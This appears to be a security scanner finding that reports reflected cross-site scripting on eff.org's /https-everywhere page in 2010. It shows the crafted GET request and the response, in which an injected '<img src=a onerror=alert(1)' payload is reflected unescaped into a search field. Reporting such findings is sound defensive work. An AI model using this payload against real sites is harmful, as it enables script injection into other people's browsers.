1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://www.eff.org |
Path: | /https-everywhere |
GET /https-everywhere66096"><img%20src%3da Host: www.eff.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Wed, 01 Dec 2010 06:38:56 GMT Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8n DAV/2 PHP/5.2.14 with Suhosin-Patch X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 01 Dec 2010 06:38:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Strict-Transport-Security Vary: Accept-Encoding Content-Length: 4702 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="text" name="q" size="18" maxlength="255" value="https-everywhere66096"><img src=a onerror=alert(1) ...[SNIP]... |